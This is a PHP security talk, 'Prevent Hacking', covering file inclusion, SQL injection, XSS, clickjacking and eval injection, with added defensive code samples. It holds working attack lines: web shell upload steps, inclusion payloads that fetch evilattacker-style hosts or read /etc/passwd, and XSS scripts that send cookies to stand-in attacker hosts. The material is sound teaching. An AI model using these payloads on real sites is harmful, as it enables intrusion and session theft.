Prevent Hacking
By : Polaki Viswanath
Welcome
About Me
1. Drupal developer.
2. Been coding in php for about 6 years.
3. And been HACKED… a lot.
Goal of today’s talk
1. Why PHP is EVIL: the different ways we get hacked.
2. How to avoid being hacked, and what a defensive coding style looks like.
What will we discuss in today’s talk
1. Cool code injections via the c99 shell, and file inclusion vulnerabilities.
2. Dictionary attacks.
3. SQL injections.
4. Script injections such as XSS (cross-site scripting) and UI redress (also called clickjacking).
5. Dynamic evaluation vulnerabilities.
6. How to avoid such attacks.
C99 Shell
Find a way to upload c99shell.php then see the magic!!!
For example:
1. Find an upload button.
2. Upload a php file having an upload field in a form with .png or .jpg extension.
3. Navigate to the uploaded file and upload the script file.
4. Run the uploaded c99 script file.
Source code found on: http://www.c99shellphp.com/
File Inclusion Vulnerability
This is categorised into two sub-categories:
1. Remote File Inclusion.
2. Local File Inclusion.
File Inclusion Vulnerability
<?php
if ( isset( $_GET['COLOR'] ) ) {
    include( $_GET['COLOR'] . '.php' );
}
?>
<form method="get">
    <select name="COLOR">
        <option value="red">red</option>
        <option value="blue">blue</option>
    </select>
    <input type="submit">
</form>
The developer intended only blue.php and red.php to be used as options. But it is possible to inject code from other files, as anyone can insert arbitrary values for the COLOR parameter.
/vulnerable.php?COLOR=http://evil.example.com/webshell.txt? - injects a remotely hosted file containing malicious code.
/vulnerable.php?COLOR=C:\ftp\upload\exploit - executes code from an already uploaded file called exploit.php (local file inclusion vulnerability).
/vulnerable.php?COLOR=C:\notes.txt%00 - example using the NUL meta character to remove the .php suffix, allowing access to files other than .php.
(Enabling magic_quotes_gpc limits the attack by escaping special characters, thus disabling the use of the NUL terminator.)
/vulnerable.php?COLOR=/etc/passwd%00 - allows an attacker to read the contents of the passwd file on a UNIX system (directory traversal).
File Inclusion Vulnerability Cont...
For example:
<?php include("inc/" . $_GET['file']); ?>
Inputs this include() accepts:
1. Including files in the same directory: ?file=.htaccess
2. Path traversal: ?file=../../../../../../../../../var/lib/locate.db (this file is very interesting because it lets you search the filesystem for other files)
3. Including injected PHP code: ?file=../../../../../../../../../var/log/apache/error.log
Some other examples:
<?php include("inc/" . $_GET['file'] . ".htm"); ?>
<?php include($_GET['file']); ?>
<?php include($_GET['file'] . ".htm"); ?>
<?php include("http://192.168.1.10/config.php"); ?>
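The COLOR include from the slide above, rewritten the way both inclusion slides call for: the request value is only ever used as a key into a fixed allow-list and the resolved path is checked to stay inside one directory. This is an added example, not code from the original talk; the themes/ directory and the file names in the allow-list are placeholders. (As an aside on the slides' notes: remote inclusion also needs allow_url_include=On, which is off by default since PHP 5.2; include() rejects paths containing a NUL byte since PHP 5.3.4; and magic_quotes_gpc was removed in PHP 5.4, so it is not a defence you can rely on.)

```php
<?php
// Added example (not from the original slides): the COLOR include from the
// slide, rewritten so the request can only select from a fixed allow-list.
// Constructed assumption: the theme files live in a "themes/" directory
// beside this script; the names below are placeholders.
declare(strict_types=1);

const ALLOWED_COLORS = ['red' => 'red.php', 'blue' => 'blue.php'];

/**
 * Map the user-supplied COLOR value to a file on disk, or return null.
 * The request value is used only as a dictionary key, never as a path,
 * so "../", "http://", "%00" and drive letters can never reach include().
 */
function resolveColorFile(string $baseDir, string $requested): ?string
{
    if (!array_key_exists($requested, ALLOWED_COLORS)) {
        return null;                       // unknown key: refuse, do not guess
    }
    $path = realpath($baseDir . '/' . ALLOWED_COLORS[$requested]);
    $root = realpath($baseDir);
    // Defence in depth: even a mis-edited allow-list entry must stay inside
    // the theme directory. realpath() resolves symlinks and "..", and
    // returns false when the file does not exist.
    if ($path === false || $root === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$file = isset($_GET['COLOR'])
    ? resolveColorFile(__DIR__ . '/themes', (string) $_GET['COLOR'])
    : null;

if ($file !== null) {
    include $file;                         // only an allow-listed, in-tree file gets here
} else {
    http_response_code(400);
    echo 'unknown colour';
}
?>
```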
Dictionary Attacks
A dictionary attack is a technique for defeating an authentication mechanism by trying to determine its decryption key or passphrase through hundreds or sometimes millions of likely guesses, such as words in a dictionary.
SQL injections
Normal Query:
SELECT UserList.Username
FROM UserList
WHERE UserList.Username = 'Username'
AND UserList.Password = 'Password'
For an input of password' OR '1'='1 in password field
Modified Query:
SELECT UserList.Username
FROM UserList
WHERE UserList.Username = 'Username'
AND UserList.Password = 'password' OR '1'='1'
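To see why the modified query above matches every row, here is the slide's login query run both ways against an in-memory SQLite database: once built by string concatenation as on the slide, once as a prepared statement (answer item 4). This is an added example, not the talk's code; it needs the pdo_sqlite extension, and the UserList table with its one row is constructed here.

```php
<?php
// Added example (not from the original slides): the login query from the
// slide run both ways against an in-memory SQLite database, so the effect of
// the  password' OR '1'='1  input can be observed without a real server.
// Requires the pdo_sqlite extension. The UserList table and its single
// row are constructed here for the demonstration.
declare(strict_types=1);

$db = new PDO('sqlite::memory:', null, null,
              [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE UserList (Username TEXT, Password TEXT)');
$db->exec("INSERT INTO UserList VALUES ('alice', 'correct horse')");

/** The slide's query, built by concatenation: user input becomes SQL. */
function loginConcatenated(PDO $db, string $user, string $pass): array
{
    $sql = "SELECT UserList.Username FROM UserList "
         . "WHERE UserList.Username = '$user' AND UserList.Password = '$pass'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

/** Same query as a prepared statement: input is bound as a value, never parsed as SQL. */
function loginPrepared(PDO $db, string $user, string $pass): array
{
    $stmt = $db->prepare('SELECT UserList.Username FROM UserList '
                       . 'WHERE UserList.Username = :u AND UserList.Password = :p');
    $stmt->execute([':u' => $user, ':p' => $pass]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$payload = "password' OR '1'='1";   // the input shown on the slide

// AND binds tighter than OR, so the WHERE clause becomes
// (Username = 'Username' AND Password = 'password') OR '1'='1' -> true for every row.
var_dump(loginConcatenated($db, 'Username', $payload)); // array(1) { [0] => "alice" }

// The bound value is compared as one literal string; no row has that password.
var_dump(loginPrepared($db, 'Username', $payload));     // array(0) { }
?>
```

The table stores the password in clear text only to mirror the slide's query; a real schema would store a password_hash() digest and compare with password_verify().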
Cross-Site Scripting or XSS attack
Valid Input:
Very nice site!
Modified version:
1. Nice site, I think I'll take it. <script>document.location="http://some_attacker/cookie.cgi?" + document.cookie</script>
2. Very nice site! <script>document.write('<iframe src="http://evilattacker.com?cookie=' + document.cookie.escape() + '" height=0 width=0 />');</script>
Clickjacking or UI Redress
A UI redress attack is any attempt by an attacker to alter the user interface of a web application. Changing the UI that a user interacts with can allow an attacker to inject new links or new HTML sections, to resize, hide or overlay interface elements, and so on. When such attacks are intended to trick a user into clicking on an injected button or link, it is usually referred to as clickjacking.
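The defensive side of the two slides above, as an added example that is not part of the original talk: the comment from the XSS slide is HTML-encoded on output so the browser shows it as text, the session cookie is flagged HttpOnly so document.cookie cannot read it, and the response carries the standard anti-framing headers that stop the page being loaded in an attacker's iframe for a UI redress overlay. The comment text is the slide's second payload stored as a plain string; everything else is constructed for the example.

```php
<?php
// Added example (not from the original slides): output encoding for the
// comment field from the XSS slide, an HttpOnly session cookie, and the
// response headers that deny framing (UI redress / clickjacking). The
// header values are the standard ones, not the author's.
declare(strict_types=1);

/** Encode untrusted text for an HTML body or a quoted attribute. */
function e(string $untrusted): string
{
    // ENT_QUOTES also encodes ' so the value is safe inside single-quoted
    // attributes; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning "".
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Headers that deny framing: the legacy header and its CSP replacement. */
function antiFramingHeaders(): array
{
    return [
        'X-Frame-Options: DENY',
        "Content-Security-Policy: frame-ancestors 'none'",
    ];
}

/** Render a stored comment; encoded on output, so it is shown as text, not executed. */
function renderComment(string $comment): string
{
    return '<p class="comment" title=\'' . e($comment) . '\'>' . e($comment) . '</p>';
}

// Scripts cannot read an HttpOnly cookie, so the slide's document.cookie
// exfiltration gets an empty string even if an injection slipped through.
ini_set('session.cookie_httponly', '1');

foreach (antiFramingHeaders() as $h) {
    header($h);
}

// The second payload from the slide, stored as a plain string:
$comment = "Very nice site! <script>document.write('<iframe src=\"http://evilattacker.com?cookie=' "
         . "+ document.cookie.escape() + '\" height=0 width=0 />');</script>";

echo renderComment($comment);
// Output contains &lt;script&gt; ... &lt;/script&gt;, which the browser renders as text.
?>
```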
Dynamic evaluation vulnerabilities
Example code:
$myvar = 'somevalue';
$x = $_GET['arg'];
eval('$myvar = ' . $x . ';');
If "arg" is set to "10; system('/bin/echo uh-oh')", additional code is run which executes a program on the server, in this case "/bin/echo".
Now what can we do?
The answer to the big question
1. Proper monitoring of the server and its configuration, and code review for loopholes.
2. Input validation, and validation of anything passed to include().
3. String escaping and magic quotes.
4. Use of prepared statements.
5. Using exceptions, and careful use of the "@" operator, eval, extract and the "$$" variable-variable syntax.
6. Avoid the backtick operator and the system and eval functions.
7. Watch out for type juggling when using "==" instead of "===".
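Two of the items above worked through, as an added example that is not from the original talk: the eval() assignment from the dynamic evaluation slide replaced by validation (items 5 and 6), and the "==" type-juggling pitfall from item 7 shown next to its strict fix. The digest strings are constructed, not real hashes.

```php
<?php
// Added example (not from the original slides): the eval() assignment from
// the slide replaced with validation, and the "==" type-juggling pitfall from
// the last slide shown beside its strict fix. All values are constructed.
declare(strict_types=1);

/** Replacement for  eval('$myvar = ' . $_GET['arg'] . ';')  : parse, do not execute. */
function readIntArg(array $query, int $default): int
{
    // FILTER_VALIDATE_INT rejects "10; system(...)" outright; the input never
    // reaches an interpreter, so there is nothing to inject into.
    $v = filter_var($query['arg'] ?? null, FILTER_VALIDATE_INT);
    return $v === false ? $default : $v;
}

/** Loose comparison treats numeric-looking strings as numbers. */
function looseCompare(string $a, string $b): bool
{
    return $a == $b;
}

/** Strict comparison checks type and value; no conversion happens. */
function strictCompare(string $a, string $b): bool
{
    return $a === $b;
}

// Two different hex digests that both look like "0e<digits>" are numeric
// strings in PHP, so "==" compares them as 0 == 0 (true in PHP 7 and 8).
$storedDigest = '0e123456789';   // constructed, stands in for a stored hash
$givenDigest  = '0e987654321';   // constructed, stands in for a submitted hash
var_dump(looseCompare($storedDigest, $givenDigest));   // bool(true)  -> "==" would accept the login
var_dump(strictCompare($storedDigest, $givenDigest));  // bool(false)
var_dump(hash_equals($storedDigest, $givenDigest));    // bool(false), and constant-time

var_dump(readIntArg(['arg' => '10'], 0));                              // int(10)
var_dump(readIntArg(['arg' => "10; system('/bin/echo uh-oh')"], 0));   // int(0): rejected
var_dump(readIntArg([], 0));                                           // int(0): missing
?>
```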
Thank you ;)
Questions ?


Editor's Notes

  • #5 https://github.com/BlackArch/webshells/tree/master/php http://localhost/c99shell.php
  • #6 https://en.wikipedia.org/wiki/File_inclusion_vulnerability
  • #10 Source: https://en.wikipedia.org/wiki/Code_injection
  • #12 Source: http://phpsecurity.readthedocs.org/en/latest/Cross-Site-Scripting-(XSS).html